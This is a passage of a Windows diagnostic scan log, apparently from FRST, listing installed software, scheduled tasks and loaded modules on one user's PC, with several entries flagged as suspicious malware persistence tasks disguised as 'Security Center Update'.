NVIDIA LED Visualizer 1.0 (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA Network Service (Version: 1.0 - NVIDIA Corporation) Hidden
NVIDIA PhysX (x32 Version: 9.13.1220 - NVIDIA Corporation) Hidden
NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA ShadowPlay 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.6514 - NVIDIA Corporation) Hidden
NVIDIA Update 15.3.33 (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Update Core (Version: 15.3.33 - NVIDIA Corporation) Hidden
NVIDIA Virtual Audio 1.2.23 (Version: 1.2.23 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 9.3.1.4482 - Electronic Arts, Inc.)
PA Mod Manager 3.4.0 (HKLM-x32\...\PA Mod Manager) (Version: 3.4.0 - Raevn)
paint.net (HKLM\...\{F509C1F4-0029-49F9-B145-A4C4E8DF481A}) (Version: 4.0.3 - dotPDN LLC)
Painter 13 - Contentx64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Core (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Corex64 (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - EN (Version: 13.0 - Corel Corporation) Hidden
Painter 13 - Setup Files (Version: 13.0 - Corel Corporation) Hidden
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Plague Inc Evolved (HKLM-x32\...\Plague Inc Evolved_is1) (Version: 0.7.5.1 - Decepticon)
PlanetSide 2 (HKCU\...\SOE-PlanetSide 2) (Version:  - Sony Online Entertainment)
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Sony Online Entertainment)
Play withSIX (HKLM-x32\...\{D7F3EEAD-183C-47DE-BDC5-593539573F97}) (Version: 1.30.0476 - SIX Networks)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
Portal 2 Authoring Tools - Beta (HKLM-x32\...\Steam App 629) (Version:  - Valve)
Portal 2 Publishing Tool (HKLM-x32\...\Steam App 644) (Version:  - )
Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden
Process Hacker 2.33 (r5590) (HKLM\...\Process_Hacker2_is1) (Version: 2.33.0.5590 - wj32)
Project Zomboid (HKLM-x32\...\Steam App 108600) (Version:  - The Indie Stone)
Psychonauts (HKLM-x32\...\Steam App 3830) (Version:  - Double Fine Productions)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake Live Mozilla Plugin (HKLM-x32\...\{FA66CFD7-0977-4C45-AACD-A8BB994B1A05}) (Version: 1.0.520 - id Software)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 3.1 beta r2280 - )
Razer Comms (HKLM-x32\...\Razer Comms) (Version: 2.0 - Razer Inc.)
Razer Game Booster (HKLM-x32\...\Razer Game Booster_is1) (Version: 4.0.68.0 - Razer Inc.)
Razer Surround (HKLM-x32\...\Razer Surround) (Version: 1.05.10 - Razer Inc.)
Razer Synapse 2.0 (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.15.20888 - Razer Inc.)
RealDownloader (x32 Version: 17.0.12 - RealNetworks, Inc.) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.12 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Red Faction: Guerrilla  (HKLM-x32\...\Steam App 20500) (Version:  - Volition)
ROBLOX Player for RaRWolf (HKCU\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.0.6 - Rockstar Games)
Rodina (HKLM-x32\...\{0B7E56F5-D39D-4A41-B3A0-D60886044041}) (Version: 1.1.0 - Elliptic Games)
Roleplaying City Map Generator (HKLM-x32\...\{3B585A53-CC41-4969-A7CB-F0E5D34ACA08}) (Version: 4.5.0.0 - )
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
RPG Maker VX Ace (HKLM-x32\...\{835D562C-B72C-461D-A9C3-B8206B66E85A}) (Version: 1.01 - RPG MAKER)
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Running With Rifles 0.98.4 (HKLM-x32\...\Running With Rifles 0.98.4) (Version: 0.98.4 - Èãðû íà Cat-A-Cat.NET)
RUNNING WITH RIFLES Demo version 0.76 (HKLM-x32\...\{5ABD42BC-4DDD-48C7-9951-48B31F27EC39}_is1) (Version: 0.76 - Modulaatio Games)
Running with rifles version 0.95 (HKLM-x32\...\{E2948988-2C6C-4070-BC8B-A1D77FE97D09}_is1) (Version: 0.95 - Modulaatio Games)
Rust (HKLM-x32\...\{E3948799-9E75-4704-8E36-071C43A2750C}) (Version: 19.12.2013 - Facepunch)
Saints Row 2 (HKLM-x32\...\Steam App 9480) (Version:  - Volition)
Sci-Fi 2 Sound Pack (HKLM-x32\...\{E7E76513-335F-4995-86CF-A85B77D8D975}) (Version: 1.3.0 - Screaming Bee)
Sci-Fi Sound Pack (HKLM-x32\...\{D13F2D95-1CE0-4147-846F-89ECB2E9A5CD}) (Version: 1.1.0 - Screaming Bee)
SDK Debuggers (x32 Version: 8.100.26629 - Microsoft Corporation) Hidden
Search Protection (HKCU\...\Search Protection) (Version: 7.5.0.1 - Spigot, Inc.) <==== ATTENTION
SHIELD Streaming (Version: 3.1.100 - NVIDIA Corporation) Hidden
Sid Meier's Civilization 5 (HKLM-x32\...\Sid Meier's Civilization 5_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Six Updater (HKLM-x32\...\{2D8CED57-CCDB-4D86-9087-3BBCAE8F8F22}) (Version: 2.09.7038 - Six Projects)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Sleeping Dogs™ (HKLM-x32\...\Steam App 202170) (Version:  - United Front Games)
Source SDK (HKLM-x32\...\Steam App 211) (Version:  - Valve)
Source SDK Base 2006 (HKLM-x32\...\Steam App 215) (Version:  - Valve)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Space Engineers (HKLM-x32\...\Steam App 244850) (Version:  - )
Space Engineers Toolbox (HKLM-x32\...\{60079798-AEE7-48FD-B642-810D3D1B2C26}) (Version: 01.039.010.1 - Mid-Space Productions)
Split/Second (HKLM-x32\...\{28526951-55EF-4901-A0CA-B9AC966D1DD1}) (Version: 1.00.0000 - Disney Interactive Studios)
Spooky Sounds (HKLM-x32\...\{D813EF9B-69CF-4996-893C-B400AE7292FA}) (Version: 2.1.0 - Screaming Bee)
Spore (HKLM-x32\...\Steam App 17390) (Version:  - Maxis)
Square Enix Secure Launcher (HKCU\...\Square Enix Secure Launcher) (Version: 1.0.0.108 - Square Enix)
Stacking (HKLM-x32\...\Steam App 115110) (Version:  - )
Star Wars Battlefront (HKLM-x32\...\{C79CB9C7-10A4-4814-8402-F574672C2192}) (Version: 1.0 - LucasArts)
Star Wars Battlefront II (HKLM-x32\...\{3D374523-CFDE-461A-827E-2A102E2AB365}) (Version: 1.0 - LucasArts)
Star wars Battlefront II version 1.3 (HKLM-x32\...\{2EF34761-F147-4984-8AF1-BB9F8DA76CDD}_is1) (Version: 1.3 - )
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
StarForge Alpha (HKLM-x32\...\Steam App 227680) (Version:  - )
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stykz for Windows 1.0.2 (HKLM-x32\...\{7E44C354-10A8-4214-9C56-F3F00775E415}_is1) (Version: 1.0.2 - Sons of Thunder Software, Inc.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab CYRI (HKLM-x32\...\{F3FCB08B-E752-444D-86A0-0634A4F3B23D}) (Version: 6.0.8.0 - Husdawg, LLC)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 2 RC2 (HKLM-x32\...\Teamspeak 2 RC2_is1) (Version: 2.0.32.60 - Dominating Bytes Design)
TeamSpeak 2 Server RC2 (HKLM-x32\...\TeamSpeak 2 Server_is1) (Version: 2.0.23.19 - TeamSpeak Systems)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.13.1 - TeamSpeak Systems GmbH)
Terraria version 1.2.4.1 (HKLM-x32\...\{1520E069-19A9-4B01-BA5D-87B67D56F55D}_is1) (Version: 1.2.4.1 - )
TES Construction Set (HKLM-x32\...\{DB3C800B-081B-4146-B4E3-EFB5B77AA913}) (Version:  - )
The Ship Single Player (HKLM-x32\...\Steam App 2420) (Version:  - Outerlight Ltd.)
The Showdown Effect (HKLM-x32\...\Steam App 204080) (Version:  - Arrowhead Game Studios)
The Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.67.2 - Electronic Arts)
The Sims™ 3 Create a World Tool - Beta (HKLM-x32\...\{65761BAE-11E8-48FE-B30F-1F01011AB906}) (Version: 1.19.6 - Electronic Arts)
The Sims™ 3 High-End Loft Stuff (HKLM-x32\...\{71828142-5A24-4BD0-97E7-976DA08CE6CF}) (Version: 3.0.38 - Electronic Arts)
The Sims™ 3 Late Night (HKLM-x32\...\{45057FCE-5784-48BE-8176-D9D00AF56C3C}) (Version: 6.5.1 - Electronic Arts)
The Witcher Enhanced Edition (HKLM-x32\...\{F138762F-5A1F-4CF0-A5E1-1588EF6088A4}) (Version: 1.00.0000 - CD Projekt Red)
Tiny and Big: Grandpa's Leftovers (HKLM-x32\...\Steam App 205910) (Version:  - Black Pants Game Studio)
Tom Clancy's Splinter Cell Chaos Theory (HKLM-x32\...\{888DD888-82BE-4D85-BCB2-2E042CD3E844}) (Version: 1.05.157 - Ubisoft)
Tom Clancy's Splinter Cell Conviction (HKLM-x32\...\{6D8DDB4A-C263-40DE-BA16-AFDAD159D59A}) (Version: 1.00.000 - Ubisoft)
Tom Clancy's Splinter Cell® Blacklist™ (HKLM-x32\...\{A6356F2F-D3E1-4D83-9AA2-72871DD0C298}) (Version: 1.00.1000 - Ubisoft)
Tomb Raider III (HKLM-x32\...\Tomb Raider III) (Version:  - )
Trials Evolution Gold Edition (HKLM-x32\...\InstallShield_{07D857B8-C956-401D-BC8F-EDA8459AF037}) (Version: 1.0.0.5 - Ubisoft)
Trials Evolution Gold Edition (x32 Version: 1.0.0.5 - Ubisoft) Hidden
TVPaint Animation 10.0 Professional Edition (32bits) (DEMO) (remove only) (HKLM-x32\...\TVP Animation 10 Pro DEMO) (Version:  - )
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-3d519be7-e7af-4b69-98ba-bbe1e7c83c74) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2012-07 (HKLM\...\UDK-8d7ec19c-13f9-47d2-a017-ad26215fc52e) (Version:  - Epic Games, Inc.)
Unreal Development Kit: 2014-02 (HKLM\...\UDK-2b78b7b2-e686-42c1-8f7c-2fe04f20f2ab) (Version:  - Epic Games, Inc.)
Unturned (HKLM-x32\...\Steam App 304930) (Version:  - Nelson Sexton)
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
Uplay (HKLM-x32\...\Uplay) (Version: 3.0 - Ubisoft)
Uplink (HKLM-x32\...\Steam App 1510) (Version:  - Introversion Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.8-4 - Wacom Technology Corp.)
Warhammer 40,000: Dawn of War - Game of the Year Edition (HKLM-x32\...\Steam App 4570) (Version:  - Relic)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
Why ASUS PC (HKLM-x32\...\{5648F9D9-299E-408C-AC1F-59DC75894A1F}) (Version: 1.00.02 - ASUSTeK Computer Inc.)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 3.6 - Bazis)
Windows Frotz (HKLM-x32\...\WindowsFrotz) (Version:  - )
Windows Live (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3503.0728 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3503.0728 - Microsoft Corporation) Hidden
Windows Software Development Kit EULA (x32 Version: 8.100.25984 - Microsoft Corporations) Hidden
Windows Software Development Kit for Windows 8.1 (HKLM-x32\...\{25981ccc-475f-4b68-850b-89d3fc287ff1}) (Version: 8.100.26695 - Microsoft Corporation)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WorldPainter 1.7.1 (HKLM-x32\...\4144-4862-0472-7103) (Version: 1.7.1 - pepsoft.org)
Wrye Bash (HKLM-x32\...\Wrye Bash) (Version: 3.0.4.4 - Wrye & Wrye Bash Development Team)
XCOM: Enemy Within (HKLM-x32\...\WENPTUVuZW15V2l0aGlu_is1) (Version: 1 - )
Xvid Video Codec (HKLM-x32\...\Xvid Video Codec 1.3.2) (Version: 1.3.3 - Xvid Team)
Zombie Panic Source (HKLM-x32\...\Steam App 17500) (Version:  - Zombie Panic Team)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
 
==================== Restore Points  =========================
 
20-10-2014 05:46:44 Scheduled Checkpoint
22-10-2014 21:46:15 Installed RPG Maker VX Ace
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {05E6FA5F-1C8C-4730-B0C9-BB8640B82410} - \Security Center Update - 467669557 No Task File <==== ATTENTION
Task: {0EF4A154-FEBC-487D-A6B4-912C12223112} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {12DD2CA7-744A-4F72-A0A0-BC680985D325} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {20D47698-8A8D-4AB4-9A50-B138F5BE18A4} - System32\Tasks\Security Center Update - 1195299623 => C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [2014-10-05] () <==== ATTENTION
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {312699F1-CA91-4A62-9438-A029F13EDF91} - System32\Tasks\Security Center Update - 2903558157 => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: {3C1DF4E4-F642-455C-B31F-F3CFE7874AB6} - \Security Center Update - 2617606942 No Task File <==== ATTENTION
Task: {4462CF66-3BFB-4F46-8DAA-EB8E5BAD58CB} - System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC} => C:\Users\RaRWolf\AppData\Roaming\qxigf.dll [2014-10-10] () <==== ATTENTION
Task: {52701CBC-326F-4144-8460-9112025E8F42} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-09] (Adobe Systems Incorporated)
Task: {5F57C186-31CD-42F4-ACD6-3D3215E5F1A0} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
Task: {6A79F1FF-3DD9-47D1-AEC9-C68EE88BE996} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-07-24] (RealNetworks, Inc.)
Task: {79C28478-DF06-4C6F-9F86-5748287A02E4} - System32\Tasks\Security Center Update - 1765064875 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: {7C755F3D-C1EB-4B49-9434-793B6F26B785} - System32\Tasks\Security Center Update - 3029572363 => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: {81E2736B-9DF6-4525-845F-19F64C31F0F9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-20] (Google Inc.)
Task: {93039A7B-8D28-42CE-9895-9E7E80712996} - System32\Tasks\Security Center Update - 3324824421 => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: {9EAC1F9E-8030-4FA0-9943-54C3E87D7310} - System32\Tasks\ASUS\ASUS AI Suite II Execute => C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe [2012-03-13] (ASUSTeK Computer Inc.)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {C0B1B98F-E445-4E29-BEE8-FF0C7288A786} - System32\Tasks\Security Center Update - 3510430382 => C:\Users\RaRWolf\AppData\Roaming\Myrycaop\exbuyvz.exe [2013-10-23] () <==== ATTENTION
Task: {C4B13F0C-D6C8-4368-A7BA-2C2DFE7ADF7E} - \Security Center Update - 2602486151 No Task File <==== ATTENTION
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {D43C5E37-B7AD-445F-8415-C2C1DD8BF3A1} - System32\Tasks\Security Center Update - 258622643 => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: {E34A9BB2-F45E-455D-919E-0C128F63BF19} - System32\Tasks\ASUS\ASUS Dr.Net Execute => C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe [2012-04-30] (ASUSTeK Computer Inc.)
Task: {E35650CE-6560-457C-9313-A69CE343EEC5} - System32\Tasks\Security Center Update - 3847798286 => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {F5166EA7-D58B-459C-B0E4-B28084AF2299} - System32\Tasks\AdobeAAMUpdater-1.0-Shoobledooble-RaRWolf => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-04-04] (Adobe Systems Incorporated)
Task: {F5F52209-55E5-40EC-8B34-A8140C33E1E3} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Security Center Update - 1195299623.job => C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 1765064875.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 258622643.job => C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 2903558157.job => C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3029572363.job => C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3324824421.job => C:\Users\RaRWolf\AppData\Roaming\Qynygare\soacm.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3510430382.job => C:\Users\RaRWolf\AppData\Roaming\Myrycaop\exbuyvz.exe <==== ATTENTION
Task: C:\Windows\Tasks\Security Center Update - 3847798286.job => C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe <==== ATTENTION
 
==================== Loaded Modules (whitelisted) =============
 
2012-09-14 05:05 - 2012-06-01 05:42 - 00920736 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
2013-01-12 13:00 - 2014-06-30 11:32 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-12-16 23:52 - 2014-05-19 21:25 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-06-27 00:17 - 2014-04-21 18:30 - 01356568 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2012-06-18 11:24 - 2012-06-18 11:24 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_05.dll
2014-10-23 17:04 - 2014-10-23 17:06 - 19114072 _____ () C:\Users\RaRWolf\Downloads\RogueKillerX64.exe
2014-10-05 07:09 - 2014-10-05 07:09 - 00306301 _____ () C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
2013-01-28 17:08 - 2013-01-28 17:08 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-01-28 17:08 - 2013-01-28 17:08 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-09-14 05:05 - 2014-10-19 21:16 - 00024576 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\PEbiosinterface32.dll
2012-09-14 05:05 - 2010-06-28 22:58 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.19\ATKEX.dll
2014-10-22 19:42 - 2014-10-22 19:42 - 00883712 _____ () C:\Users\RaRWolf\AppData\Local\Ecvtion\EP0NXFR1.DLL
2014-10-22 19:40 - 2014-10-22 19:40 - 00915456 _____ () C:\Users\RaRWolf\AppData\Local\Alldworks\AdobeScCore.dll
2014-10-18 17:10 - 2014-10-09 22:03 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libglesv2.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\libegl.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\pdf.dll
2014-10-18 17:09 - 2014-10-09 22:03 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\ffmpegsumo.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00505344 _____ () C:\Music\AIMP3\Sqlite3.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 00218112 _____ () C:\Music\AIMP3\libsoxr.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 00220672 _____ () C:\Music\AIMP3\Modules\MACDll.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 00294400 _____ () C:\Music\AIMP3\Modules\libFLAC.dll
2014-10-08 22:00 - 2014-10-08 22:00 - 01733120 _____ () C:\Music\AIMP3\Modules\aimp_libvorbis.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00072136 _____ () C:\Music\AIMP3\Plugins\aimp_lastfm.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00026624 _____ () C:\Music\AIMP3\Plugins\Aorta.svp
2014-10-08 21:59 - 2014-10-08 22:00 - 00237568 _____ () C:\Music\AIMP3\Plugins\OptimFROG.dll
2014-10-08 21:59 - 2014-10-08 22:00 - 00141768 _____ () C:\Music\AIMP3\Plugins\PandemicAnalogMeter.dll
2014-10-18 17:10 - 2014-10-09 22:04 - 14902600 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\PepperFlash\pepflashplayer.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 01171456 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00442368 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2013-03-12 17:10 - 2014-10-01 19:16 - 00774656 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2014-05-21 17:41 - 2014-10-21 15:22 - 02226880 _____ () C:\Program Files (x86)\Steam\video.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00403968 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-08-22 00:02 - 2014-08-21 14:15 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2012-12-26 16:38 - 2014-10-21 15:22 - 00682176 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2012-12-26 16:38 - 2014-09-04 19:29 - 34589376 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2014-08-14 20:06 - 2014-09-04 19:29 - 00837824 _____ () C:\Program Files (x86)\Steam\bin\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\Windows\system32\Drivers\fsthvckq.sys:changelist
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
